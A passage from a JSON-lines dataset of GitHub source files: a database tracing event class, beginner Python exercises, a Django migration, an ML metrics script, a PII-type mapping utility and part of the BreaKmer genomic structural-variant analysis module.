occurred)\n \"\"\"\n\n super(DBAPIEvent, self).__init__(start_time)\n self.event_id = 'dbapi-{}'.format(str(uuid4()))\n\n # in case of pg instrumentation we extract data from the dsn property\n if hasattr(connection, 'dsn'):\n dsn = parse_dsn(connection.dsn)\n db_name = dsn.get('dbname', '')\n host = dsn.get('host', 'local')\n query = cursor.query\n else:\n query = _args[0]\n host = connection.extract_hostname\n db_name = connection.extract_dbname\n\n self.resource['name'] = db_name if db_name else host\n\n # NOTE: The operation might not be identified properly when\n # using 'WITH' clause\n splitted_query = query.split()\n if not splitted_query:\n print_debug('Cannot extract operation from query {}'.format(query))\n operation = ''\n else:\n operation = splitted_query[0].lower()\n self.resource['operation'] = operation\n # override event type with the specific DB type\n self.resource['type'] = database_connection_type(\n host,\n self.RESOURCE_TYPE\n )\n self.resource['metadata'] = {\n 'Host': host,\n 'Driver': connection.__class__.__module__.split('.')[0],\n 'Table Name': self._extract_table_name(query, operation)\n }\n\n # for select we always want to save the query\n if (\n (operation == 'select') or\n (not trace_factory.metadata_only)\n ):\n self.resource['metadata']['Query'] = query[:MAX_QUERY_SIZE]\n\n if exception is None:\n # Update response data\n self.resource['metadata']['Related Rows Count'] = int(\n cursor.rowcount\n )\n else:\n self.set_exception(exception, traceback.format_exc())\n\n @staticmethod\n def _extract_table_name(query, operation):\n \"\"\"\n Extract the table name from the SQL query string\n :param query: The SQL query string\n :param operation: The SQL operation used in the query\n (SELECT, INSERT, etc.)\n :return: Table name (string), \"\" if couldn't find\n \"\"\"\n\n if operation in DBAPIEvent._OPERATION_TO_TABLE_NAME_KEYWORD:\n keyword = DBAPIEvent._OPERATION_TO_TABLE_NAME_KEYWORD[operation]\n query_words = query.lower().split()\n if keyword in query_words:\n return query.split()[query_words.index(keyword) + 1]\n\n return ''\n\n\nclass DBAPIEventFactory(object):\n \"\"\"\n Factory class, generates dbapi event.\n \"\"\"\n\n @staticmethod\n # pylint: disable=W0613\n def create_event(wrapped, cursor_wrapper, args, kwargs, start_time,\n response, exception):\n \"\"\"\n Create an event according to the given operation.\n :param wrapped:\n :param cursor_wrapper:\n :param args:\n :param kwargs:\n :param start_time:\n :param response:\n :param exception:\n :return:\n \"\"\"\n event = DBAPIEvent(\n cursor_wrapper.connection_wrapper,\n cursor_wrapper,\n args,\n kwargs,\n start_time,\n exception,\n )\n trace_factory.add_event(event)\n","repo_name":"epsagon/epsagon-python","sub_path":"epsagon/events/dbapi.py","file_name":"dbapi.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"77"} +{"seq_id":"1340410213","text":"# Write a program that accepts a sentence and calculate the number of upper case letters and lower case letters.\nsentence = input('Please enter your sentence? ')\nupperNo, lowerNo = 0, 0\nfor x in sentence:\n if x.isupper():\n upperNo += 1\n elif x.islower():\n lowerNo += 1\nprint(f'UPPER CASE {upperNo}')\nprint(f'LOWER CASE {lowerNo}')\n","repo_name":"ngSunil/python_100","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17471681202","text":"from input_info import print_sizes_for_n\nimport sys\n\n\ndef insert_sort(arr):\n operations = 0\n n = len(arr)\n\n for i in range(1, n):\n operations += 1\n j = i\n while j > 0 and arr[j - 1] > arr[j]:\n operations += 1\n temp = arr[j - 1]\n arr[j - 1] = arr[j]\n arr[j] = temp\n j = j - 1\n\n print_sizes_for_n(n)\n this_function_name = sys._getframe().f_code.co_name\n print(\"Total number of operations for {}: {}\"\n .format(this_function_name, operations))\n return arr\n\n\ndef selection_sort(arr):\n operations = 0\n n = len(arr)\n\n for i in range(0, n):\n operations += 1\n for j in range(i, n):\n operations += 1\n if arr[i] > arr[j]:\n temp = arr[i]\n arr[i] = arr[j]\n arr[j] = temp\n\n print_sizes_for_n(n)\n this_function_name = sys._getframe().f_code.co_name\n print(\"Total number of operations for {}: {}\"\n .format(this_function_name, operations))\n return arr\n\nif __name__ == '__main__':\n # numbers from 1000 to 0 in decreasing order\n arr = list(range(1000, 0, -1))\n\n # passing the list as a value with list[:]\n insert_sort(arr[:])\n selection_sort(arr[:])\n","repo_name":"RadoRado/playground","sub_path":"algos/sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39112491752","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('plan', '0008_auto_20150213_1138'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PlanApplied',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('plan', models.ForeignKey(related_name=b'applications', to='plan.Plan')),\n ('user', models.ForeignKey(related_name=b'plans_applied', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='planapplied',\n unique_together=set([('user', 'plan')]),\n ),\n migrations.AddField(\n model_name='plansessionapplied',\n name='application',\n field=models.ForeignKey(related_name=b'sessions', null=True, to='plan.PlanApplied'),\n preserve_default=False,\n ),\n ]\n","repo_name":"La0/runreport","sub_path":"src/plan/migrations/0009_auto_20150216_1048.py","file_name":"0009_auto_20150216_1048.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"9138496942","text":"import pandas as pd \nimport numpy as np \nimport argparse\nimport os\nimport glob\n\nparser = argparse.ArgumentParser(description='Print average metrics over folds')\nparser.add_argument('model_folder', type=str, help='Folder containing subfolders for each fold')\nparser.add_argument('--fallback_folder', type=str, help='Folder to use if best model doesn\\'t exist (finetuning case)')\nargs = parser.parse_args()\n\nall_best_metrics = []\nfor subfolder in os.listdir(args.model_folder):\n model_folder = args.model_folder if len(glob.glob(os.path.join(args.model_folder, subfolder, '*best*'))) \\\n else args.fallback_folder\n metrics = pd.read_csv(os.path.join(model_folder, subfolder, 'history.csv'), index_col=0)\n best_metrics = metrics.iloc[metrics['val_total_loss'].idxmin()]\n all_best_metrics.append(best_metrics)\n\nall_best_metrics = pd.DataFrame(all_best_metrics)\navg_best_metrics = all_best_metrics.mean(axis=0)\n#print('Train appear mAP:', avg_best_metrics['train_appear_mAP'])\nprint('Val appear mAP:', avg_best_metrics['val_appear_mAP'])\n#print('Train grade mAP:', avg_best_metrics['train_grade_mAP'])\nprint('Val grade mAP:', avg_best_metrics['val_grade_mAP'])\n\nprint('Val appear AP c0:', avg_best_metrics['val_appear_AP_c0'])\nprint('Val appear AP c1:', avg_best_metrics['val_appear_AP_c1'])\nprint('Val appear AP c2:', avg_best_metrics['val_appear_AP_c2'])\nprint('Val appear AP c3:', avg_best_metrics['val_appear_AP_c3'])\n\nprint('Val grade AP c0:', avg_best_metrics['val_grade_AP_c0'])\nprint('Val grade AP c1:', avg_best_metrics['val_grade_AP_c1'])\nprint('Val grade AP c2:', avg_best_metrics['val_grade_AP_c2'])\n\n# print()\n# print(all_best_metrics[['val_appear_mAP', 'val_grade_mAP']])\n\n# print('Val appear acc:', avg_best_metrics['val_appear_acc'])\n# print('Val grade acc:', avg_best_metrics['val_grade_acc'])\n# print('Val appear auc:', avg_best_metrics['val_appear_auroc'])\n# print('Val grade auc:', avg_best_metrics['val_grade_auroc'])\n ","repo_name":"rish-raghu/RICORD-Classification","sub_path":"code/scripts/metrics/avg_fold_stats.py","file_name":"avg_fold_stats.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20944043384","text":"def add(a,b):\r\n result = a+b\r\n print(result)\r\n\r\ndef sub(a,b):\r\n result = a-b\r\n print(result)\r\n\r\ndef mul(a,b):\r\n result = a*b\r\n print(result)\r\n\r\ndef div(a,b):\r\n result = a/b\r\n print(result)\r\n\r\na = int(input(\"Enter first number: \"))\r\nb = int(input(\"Enter second number: \"))\r\noperation =input(\"Enter the operation: \")\r\n\r\nif operation == \"+\":\r\n add(a,b)\r\nelif operation == \"-\":\r\n sub(a,b)\r\nelif operation == \"*\":\r\n mul(a,b)\r\nelif operation == \"/\":\r\n div(a,b)\r\nelse:\r\n print(\"Invalid input!\")\r\n","repo_name":"kashykashh/calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11725677115","text":"# pylint: disable=broad-except, unused-variable\nfrom typing import Optional\n\nfrom pii_codex.models.aws_pii import AWSComprehendPIIType\nfrom pii_codex.models.azure_pii import AzurePIIType\nfrom pii_codex.models.common import (\n RiskLevel,\n ClusterMembershipType,\n HIPAACategory,\n DHSCategory,\n NISTCategory,\n PIIType,\n MetadataType,\n RiskLevelDefinition,\n)\nfrom pii_codex.models.analysis import RiskAssessment\nfrom pii_codex.models.microsoft_presidio_pii import MSFTPresidioPIIType\n\nfrom pii_codex.utils.file_util import open_pii_type_mapping_csv\n\n\nclass PIIMapper:\n \"\"\"\n Class to map PII types listed as Common Types, Azure Types, AWS Comprehend Types, and Presidio Types\n \"\"\"\n\n def __init__(self):\n self._pii_mapping_data_frame = open_pii_type_mapping_csv(\"v1\")\n\n def map_pii_type(self, pii_type: str) -> RiskAssessment:\n \"\"\"\n Maps the PII Type to a full RiskAssessment including categories it belongs to, risk level, and\n its location in the text. This cross-references some of the types listed by Milne et al. (2016)\n\n @param pii_type:\n @return:\n \"\"\"\n\n information_detail_lookup = self._pii_mapping_data_frame[\n self._pii_mapping_data_frame.PII_Type == pii_type\n ]\n\n # Retrieve the risk_level name by the value of the risk definition enum entry\n if information_detail_lookup.empty:\n raise Exception(\n f\"An error occurred while processing the detected entity {pii_type}\"\n )\n\n risk_level_definition = RiskLevelDefinition(\n information_detail_lookup.Risk_Level.item()\n )\n\n return RiskAssessment(\n pii_type_detected=pii_type,\n risk_level=RiskLevel[risk_level_definition.name].value,\n risk_level_definition=risk_level_definition.value,\n cluster_membership_type=ClusterMembershipType(\n information_detail_lookup.Cluster_Membership_Type.item()\n ).value,\n hipaa_category=HIPAACategory[\n information_detail_lookup.HIPAA_Protected_Health_Information_Category.item()\n ].value,\n dhs_category=DHSCategory(\n information_detail_lookup.DHS_Category.item()\n ).value,\n nist_category=NISTCategory(\n information_detail_lookup.NIST_Category.item()\n ).value,\n )\n\n @classmethod\n def convert_common_pii_to_msft_presidio_type(\n cls, pii_type: PIIType\n ) -> MSFTPresidioPIIType:\n \"\"\"\n Converts a common PII Type to a MSFT Presidio Type\n @param pii_type:\n @return:\n \"\"\"\n\n try:\n converted_type = MSFTPresidioPIIType[pii_type.name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n return converted_type\n\n @classmethod\n def convert_common_pii_to_azure_pii_type(cls, pii_type: PIIType) -> AzurePIIType:\n \"\"\"\n Converts a common PII Type to an Azure PII Type\n @param pii_type:\n @return:\n \"\"\"\n try:\n return AzurePIIType[pii_type.name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_common_pii_to_aws_comprehend_type(\n cls,\n pii_type: PIIType,\n ) -> AWSComprehendPIIType:\n \"\"\"\n Converts a common PII Type to an AWS PII Type\n @param pii_type:\n @return:\n \"\"\"\n try:\n return AWSComprehendPIIType[pii_type.name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_azure_pii_to_common_pii_type(cls, pii_type: str) -> PIIType:\n \"\"\"\n Converts an Azure PII Type to a common PII Type\n @param pii_type:\n @return:\n \"\"\"\n try:\n if pii_type == AzurePIIType.USUK_PASSPORT_NUMBER.value:\n # Special case, map to USUK for all US and UK Passport types\n return PIIType.US_PASSPORT_NUMBER\n\n return PIIType[AzurePIIType(pii_type).name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_aws_comprehend_pii_to_common_pii_type(\n cls,\n pii_type: str,\n ) -> PIIType:\n \"\"\"\n Converts an AWS PII Type to a common PII Type\n @param pii_type: str from AWS Comprehend (maps to value of AWSComprehendPIIType)\n @return:\n \"\"\"\n try:\n return PIIType[AWSComprehendPIIType(pii_type).name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_msft_presidio_pii_to_common_pii_type(\n cls,\n pii_type: str,\n ) -> PIIType:\n \"\"\"\n Converts a Microsoft Presidio PII Type to a common PII Type\n @param pii_type: str from Presidio (maps to value of PIIType)\n @return:\n \"\"\"\n try:\n return PIIType[MSFTPresidioPIIType(pii_type).name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this PII Type conversion.\"\n )\n\n @classmethod\n def convert_metadata_type_to_common_pii_type(\n cls, metadata_type: str\n ) -> Optional[PIIType]:\n \"\"\"\n Converts metadata type str entry to common PII type\n @param metadata_type:\n @return: PIIType\n \"\"\"\n\n try:\n if metadata_type.lower() == \"name\":\n return PIIType.PERSON\n\n if metadata_type.lower() == \"user_id\":\n # If dealing with public data, user_id can be used to pull down\n # social network profile\n return PIIType.SOCIAL_NETWORK_PROFILE\n\n return PIIType[MetadataType(metadata_type.lower()).name]\n except Exception as ex:\n raise Exception(\n \"The current version does not support this Metadata to PII Type conversion.\"\n )\n","repo_name":"EdyVision/pii-codex","sub_path":"pii_codex/utils/pii_mapping_util.py","file_name":"pii_mapping_util.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"77"} +{"seq_id":"75048198327","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n\n'''\nBreaKmer target module\n'''\n\n\nimport sys\nimport os\nimport subprocess\nimport shutil\nimport pysam\nimport breakmer.utils as utils\nimport breakmer.assembly.assembler as assembler\nimport breakmer.caller.sv_caller2 as sv_caller\nimport pdb\n\n__author__ = \"Ryan Abo\"\n__copyright__ = \"Copyright 2015, Ryan Abo\"\n__email__ = \"ryanabo@gmail.com\"\n__license__ = \"MIT\"\n\n\ndef pe_meta(aread):\n\n '''\n '''\n\n # First check if read is from a proper paired-end mapping --> <--\n proper_map = False\n overlap_reads = False\n proper_map1 = ((aread.flag == 83) or (aread.flag == 147)) and (aread.tlen < 0)\n proper_map2 = ((aread.flag == 99) or (aread.flag == 163)) and (aread.tlen > 0)\n if proper_map1 or proper_map2:\n proper_map = True\n if abs(aread.tlen) < (2 * len(aread.seq)):\n overlap_reads = True\n return proper_map, overlap_reads\n\n\ndef add_discordant_pe(aread, read_d, bamfile):\n\n '''\n '''\n\n qname = aread.qname\n # Keep discordant read pairs where the map quality is > 0, the paired reads are mapped to different chroms or > 1000 bp apart, and\n # the mate is mapped.\n if aread.mapq > 0 and ((aread.rnext != -1 and aread.tid != aread.rnext) or abs(aread.tlen) > 1000) and not aread.mate_is_unmapped:\n mate_refid = bamfile.getrname(aread.rnext) # Grab the paired read\n # mate_read = None\n # try:\n # mate_read = bamfile.mate(aread)\n # except:\n # print 'Skipping read'\n # pass\n\n # if mate_read is not None:\n # if mate_read.mapq > 0:\n if mate_refid not in read_d['disc']:\n read_d['disc'][mate_refid] = []\n read_d['disc'][mate_refid].append((aread.pos, aread.pnext)) # Store the read position and the mate position\n\n if aread.mapq > 0 and not aread.mate_is_unmapped and aread.tid == aread.mrnm:\n if aread.is_read1:\n read_positions = None\n if aread.is_reverse and aread.mate_is_reverse:\n # reverse -- reverse, samflag 115 (note: only considering read1, read2 samflag 179)\n read_positions = (aread.pos, aread.mpos, 0, 0, qname)\n if aread.mpos < aread.pos:\n read_positions = (aread.mpos, aread.pos, 0, 0, qname)\n read_d['inv_reads'].append(read_positions)\n elif not aread.is_reverse and not aread.mate_is_reverse:\n # forward -- forward = samflag 67 (note: only considering read1, read2 samflag 131)\n read_positions = (aread.pos, aread.mpos, 1, 1, qname)\n if aread.mpos < aread.pos:\n read_positions = (aread.mpos, aread.pos, 1, 1, qname)\n read_d['inv_reads'].append(read_positions)\n elif aread.is_reverse and not aread.mate_is_reverse and aread.pos < aread.mpos:\n # reverse -- forward = samflag 83 with positive insert (read2 samflag 163 with + insert size)\n read_positions = (aread.pos, aread.mpos, 0, 1, aread.qname)\n read_d['td_reads'].append(read_positions)\n elif not aread.is_reverse and aread.mate_is_reverse and aread.mpos < aread.pos:\n # reverse -- forward = samflag 99 with - insert (read2 samflag 147 with - insert)\n read_positions = (aread.mpos, aread.pos, 1, 0, qname)\n read_d['td_reads'].append(read_positions)\n if read_positions:\n read_d['other'].append(read_positions)\n\n\nclass TargetManager(object):\n\n '''TargetManager class handles all the high level information relating to a target.\n The analysis is peformed at the target level, so this class contains all the information\n necessary to perform an independent analysis.\n\n Attributes:\n params (ParamManager): Parameters for breakmer analysis.\n logging_name (str): Module name for logging file purposes.\n name (str): Target name specified in the input bed file.\n chrom (str): Chromosome ID as specified in the input bed file.\n start (int): Genomic position for the target region (minimum value among all intervals).\n end (int): Genomic position for the target region (maximum value among all intervals).\n paths (dict): Contains the analysis paths for this target.\n files (dict): Dicionary containing paths to file names needed for analysis.\n read_len (int): Length of a single read.\n variation (Variation): Stores data for variants identified within the target.\n regionBuffer (int): Base pairs to add or subtract from the target region end and start locations.\n\n '''\n\n def __init__(self, intervals, params):\n\n '''\n '''\n\n self.params = params\n self.name = None\n self.chrom = None\n self.start = None\n self.end = None\n self.paths = {}\n self.files = {}\n self.disc_reads = None\n self.sv_reads = None\n self.cleaned_read_recs = None\n self.kmer_clusters = []\n self.kmers = {}\n self.contigs = []\n self.results = []\n self.formatted_results = []\n self.svs = {'trl':[0, '-'], 'indel':[0, ''], 'rearrangement':[0, '']}\n self.target_intervals = intervals\n self.repeat_mask = None\n self.logging_name = 'breakmer.processor.target'\n self.call_manager = sv_caller.SVCallManager(params)\n self.setup()\n\n def setup(self):\n\n '''Setup the target object with the input params.\n\n Define the location (chrom, start, end), file paths, directory paths, and name.\n\n Args:\n None\n Returns:\n None\n '''\n\n for value in self.target_intervals:\n if not self.name:\n self.name = value[3]\n if not self.chrom:\n self.chrom = value[0]\n if not self.start:\n self.start = int(value[1])\n if not self.end:\n self.end = int(value[2])\n if int(value[1]) < self.start:\n self.start = int(value[1])\n if int(value[2]) > self.end:\n self.end = int(value[2])\n\n '''\n Create the proper paths for the target analysis.\n\n Each target analyzed has a set of directories associated with it.\n\n targets/\n /\n data/\n contigs/\n kmers/\n There is separate directory for each target in the output directory.\n\n output/\n /\n '''\n\n self.add_path('base', os.path.join(self.params.paths['targets'], self.name))\n self.add_path('ref_data', os.path.join(self.params.paths['ref_data'], self.name))\n self.add_path('data', os.path.join(self.paths['base'], 'data'))\n self.add_path('contigs', os.path.join(self.paths['base'], 'contigs'))\n self.add_path('kmers', os.path.join(self.paths['base'], 'kmers'))\n self.add_path('output', os.path.join(self.params.paths['output'], self.name))\n\n # Set reference paths\n if 'keep_repeat_regions' in self.params.opts:\n if not self.params.opts['keep_repeat_regions']:\n if 'repeat_mask_file' not in self.params.opts:\n utils.log(self.logging_name, 'error', 'Keep repeat regions option is false, but no repeat mask bed file provided. All repeat region variants will be reported.')\n self.params.opts['keep_repeat_regions'] = True\n else:\n self.files['rep_mask_fn'] = os.path.join(self.paths['ref_data'], self.name+'_rep_mask.bed')\n\n '''\n Each target has reference files associated with it.\n\n /\n /\n _forward_refseq.fa\n _reverse_refseq.fa\n _forward_refseq.fa_dump\n _reverse_refseq.fa_dump\n '''\n self.files['target_ref_fn'] = [os.path.join(self.paths['ref_data'], self.name + '_forward_refseq.fa'), os.path.join(self.paths['ref_data'], self.name + '_reverse_refseq.fa')]\n\n ref_fa_marker_f = open(os.path.join(self.paths['ref_data'], '.reference_fasta'), 'w')\n ref_fa_marker_f.write(self.params.opts['reference_fasta'])\n ref_fa_marker_f.close()\n\n self.files['ref_kmer_dump_fn'] = [os.path.join(self.paths['ref_data'], self.name + '_forward_refseq.fa_dump'), os.path.join(self.paths['ref_data'], self.name + '_reverse_refseq.fa_dump')]\n\n def get_sv_reads(self):\n\n '''\n '''\n\n self.extract_bam_reads('sv')\n if 'normal_bam_file' in self.params.opts:\n self.extract_bam_reads('norm')\n self.clean_reads('norm')\n\n check = True\n if not self.clean_reads('sv'):\n shutil.rmtree(self.paths['output'])\n check = False\n return check\n\n def setup_read_extraction_files(self, sample_type):\n\n '''\n '''\n\n self.files['%s_fq' % sample_type] = os.path.join(self.paths['data'], self.name + \"_sv_reads.fastq\")\n self.files['%s_sc_unmapped_fa' % sample_type] = os.path.join(self.paths['data'], self.name + \"_sv_sc_seqs.fa\")\n if sample_type == 'sv':\n self.files['sv_bam'] = os.path.join(self.paths['data'], self.name + \"_sv_reads.bam\")\n self.files['sv_bam_sorted'] = os.path.join(self.paths['data'], self.name + \"_sv_reads.sorted.bam\")\n\n def extract_bam_reads(self, sample_type):\n\n '''\n '''\n self.setup_read_extraction_files(sample_type)\n\n bam_type = 'sample'\n if sample_type == 'norm':\n bam_type = 'normal'\n\n utils.log(self.logging_name, 'info', 'Extracting bam reads from %s to %s' % (self.params.opts['%s_bam_file' % bam_type], self.files['sv_fq']))\n\n bamfile = pysam.Samfile(self.params.opts['%s_bam_file' % bam_type], 'rb')\n if sample_type == 'sv':\n sv_bam = pysam.Samfile(self.files['sv_bam'], 'wb', template=bamfile)\n\n read_d = {'unmapped':{},\n 'disc':{},\n 'sv':{},\n 'unmapped_keep':[],\n 'inv_reads':[],\n 'td_reads':[],\n 'other':[]\n }\n\n buffer_size = int(self.params.get_param('buffer_size'))\n kmer_size = int(self.params.get_param('kmer_size'))\n\n utils.log(self.logging_name, 'debug', 'Fetching bam file reads from %s, %s %d %d' % (self.params.opts['%s_bam_file' % bam_type], self.chrom, self.start - buffer_size, self.end + buffer_size))\n aligned_reads = bamfile.fetch(self.chrom, self.start - buffer_size, self.end + buffer_size)\n\n pair_indices = {}\n valid_reads = []\n\n for aligned_read in aligned_reads:\n\n if aligned_read.is_duplicate or aligned_read.is_qcfail: # Skip duplicates and failures\n continue\n if aligned_read.is_unmapped: # Store unmapped reads\n read_d['unmapped'][aligned_read.qname] = aligned_read\n continue\n\n if aligned_read.mate_is_unmapped or aligned_read.rnext == -1: # Indicate that mate is unmapped\n aligned_read.mate_is_unmapped = True\n\n proper_map = False\n overlap_reads = False\n\n # These two functions can operate on the first read of the pair.\n # Check if fragment hasn't been checked yet and that the mate is mapped.\n if aligned_read.qname not in pair_indices and not aligned_read.mate_is_unmapped:\n add_discordant_pe(aligned_read, read_d, bamfile)\n proper_map, overlap_reads = pe_meta(aligned_read)\n valid_reads.append((aligned_read, proper_map, overlap_reads))\n\n if aligned_read.qname not in pair_indices and not aligned_read.mate_is_unmapped:\n pair_indices[aligned_read.qname] = {}\n if aligned_read.qname in pair_indices:\n pair_indices[aligned_read.qname][int(aligned_read.is_read1)] = len(valid_reads) - 1\n\n # If read is mapped and mate is unmapped\n if (aligned_read.pos >= self.start and aligned_read.pos <= self.end) and aligned_read.mapq > 0 and aligned_read.mate_is_unmapped:\n read_d['unmapped_keep'].append(aligned_read.qname)\n # pair_indices, valid_reads = process_reads(areads, read_d, bamfile) # Deprecated\n\n # for aread, proper_map, overlap_reads in valid_reads: # Deprecated\n # Only take soft-clips from outer regions of properly mapped reads, take all others\n if (aligned_read.cigar is None) or (len(aligned_read.cigar) <= 1): # cigar is a list of tuples\n continue\n\n # if aligned_read.cigar and len(aligned_read.cigar) > 1:\n trim_coords = utils.trim_coords(aligned_read.qual, 3) # Identify the read positions with qual > 2\n clip_coords = utils.get_clip_coords(aligned_read.qual, aligned_read.cigar)\n\n # Only keep reads that have a soft clip in sequence that has not been trimmed\n # due to low quality sequence.\n # if clip_coords[0] > trim_coords[0] or clip_coords[1] < trim_coords[1]: # Deprecated\n if clip_coords[0] <= trim_coords[0] and clip_coords[1] >= trim_coords[1]:\n continue\n\n sc_seq = {'clipped':[], 'buffered':[]}\n new_clip_coords = [0, 0]\n start_coord, end_coord = clip_coords\n add_sc = [False, False]\n indel_only = False\n start_sc = start_coord > 0\n end_sc = end_coord < len(aligned_read.qual)\n seq = aligned_read.seq\n\n if start_sc and end_sc:\n add_sc = [True, True]\n else:\n if start_sc:\n add_sc[0] = True\n new_clip_coords = [0, start_coord]\n if overlap_reads and aligned_read.is_reverse:\n mate_seq = valid_reads[pair_indices[aligned_read.qname][int(aligned_read.is_read1)]][0].seq\n add_sc[0] = self.check_pair_overlap(mate_seq, aligned_read, [0, start_coord], 'back')\n if proper_map:\n indel_only = aligned_read.is_reverse\n elif end_sc:\n new_clip_coords = [end_coord, len(seq)]\n add_sc[1] = True\n if overlap_reads and not aligned_read.is_reverse:\n mate_seq = valid_reads[pair_indices[aligned_read.qname][int(aligned_read.is_read1)]][0].seq\n add_sc[1] = self.check_pair_overlap(mate_seq, aligned_read, [end_coord, len(seq)], 'front')\n if proper_map:\n indel_only = (indel_only and False) if aligned_read.is_reverse else (indel_only and True)\n final_add = add_sc[0] or add_sc[1]\n if add_sc[0]:\n sc_seq['buffered'].append(aligned_read.seq[0:(start_coord + kmer_size)])\n sc_seq['clipped'].append(aligned_read.seq[0:start_coord])\n if add_sc[1]:\n sc_seq['buffered'].append(seq[(end_coord - kmer_size):len(seq)])\n sc_seq['clipped'].append(seq[end_coord:len(seq)])\n if final_add:\n read_d['sv'][utils.get_seq_readname(aligned_read)] = (aligned_read, sc_seq, new_clip_coords, indel_only)\n # end for loop\n\n sv_fq = open(self.files['sv_fq'], 'w')\n sv_sc_fa = open(self.files['sv_sc_unmapped_fa'], 'w')\n\n for qname in read_d['unmapped_keep']:\n if qname in read_d['unmapped']:\n read = read_d['unmapped'][qname]\n read_d['sv'][utils.get_seq_readname(read)] = (read, None, None, False)\n sv_sc_fa.write(\">\" + read.qname + \"\\n\" + str(read.seq) + \"\\n\")\n\n if not self.sv_reads:\n self.sv_reads = {}\n self.sv_reads[sample_type] = {}\n for qname in read_d['sv']:\n aligned_read, sc_seq, clip_coords, indel_only = read_d['sv'][qname]\n self.sv_reads[sample_type][qname] = read_d['sv'][qname]\n if sample_type == 'sv':\n sv_bam.write(aligned_read)\n lout = utils.fq_line(aligned_read, indel_only, int(self.params.get_param('kmer_size')), True)\n if lout is not None:\n sv_fq.write(lout)\n if sc_seq:\n for clip_seq in sc_seq['buffered']:\n sv_sc_fa.write(\">\" + qname + \"\\n\" + clip_seq + \"\\n\")\n self.disc_reads = {'disc':read_d['disc'], 'inv':read_d['inv_reads'], 'td':read_d['td_reads'], 'other':read_d['other']}\n sv_fq.close()\n sv_sc_fa.close()\n bamfile.close()\n\n if sample_type == 'sv':\n sv_bam.close()\n utils.log(self.logging_name, 'info', 'Sorting bam file %s to %s' % (self.files['sv_bam'], self.files['sv_bam_sorted']))\n pysam.sort(\"-o\", self.files['sv_bam_sorted'], self.files['sv_bam'])\n utils.log(self.logging_name, 'info', 'Indexing sorted bam file %s' % self.files['sv_bam_sorted'])\n pysam.index(self.files['sv_bam_sorted'])\n\n def clean_reads(self, sample_type):\n\n '''\n '''\n\n # Run cleaning program\n cutadapt = self.params.get_param('cutadapt')\n cutadapt_config = self.params.get_param('cutadapt_config_file')\n utils.log(self.logging_name, 'info', 'Cleaning reads using %s with configuration file %s' % (cutadapt, cutadapt_config))\n\n self.files['%s_cleaned_fq' % sample_type] = os.path.join(self.paths['data'], self.name + \"_%s_reads_cleaned.fastq\" % sample_type)\n\n utils.log(self.logging_name, 'info', 'Writing clean reads to %s' % self.files['%s_cleaned_fq' % sample_type])\n cutadapt_parameters = utils.stringify(cutadapt_config)\n cutadapt_cmd = '%s %s %s %s > %s' % (sys.executable, cutadapt, cutadapt_parameters, self.files['%s_fq' % sample_type], self.files['%s_cleaned_fq' % sample_type])\n utils.log(self.logging_name, 'debug', 'Cutadapt system command %s' % cutadapt_cmd)\n cutadapt_proc = subprocess.Popen(cutadapt_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n output, errors = cutadapt_proc.communicate()\n utils.log(self.logging_name, 'debug', 'Clean reads output %s' % output)\n utils.log(self.logging_name, 'debug', 'Clean reads errors %s' % errors)\n\n # Use these for pulling out reads after finding sample-only kmers.\n # Filter the cleaned reads to make sure soft clips were not adapters, re-write fastq\n if not self.cleaned_read_recs:\n self.cleaned_read_recs = {}\n self.cleaned_read_recs[sample_type] = None\n self.files['%s_cleaned_fq' % sample_type], self.cleaned_read_recs[sample_type] = utils.get_fastq_reads(self.files['%s_cleaned_fq' % sample_type], self.sv_reads[sample_type])\n self.sv_reads[sample_type] = None\n check = True\n if len(self.cleaned_read_recs[sample_type]) == 0:\n check = False\n\n utils.log(self.logging_name, 'info', 'Check there are cleaned reads %r' % check)\n return check\n\n def compare_kmers(self):\n\n '''\n '''\n\n self.kmers['ref'] = {}\n jellyfish = self.params.get_param('jellyfish')\n kmer_size = int(self.params.get_param('kmer_size'))\n\n for i in range(len(self.files['target_ref_fn'])):\n utils.log(self.logging_name, 'info', 'Indexing kmers for reference sequence %s' % self.files['target_ref_fn'][i])\n self.kmers['ref'] = utils.load_kmers(utils.run_jellyfish(self.files['target_ref_fn'][i], jellyfish, kmer_size), self.kmers['ref'])\n\n # if 'target_altref_fn' in 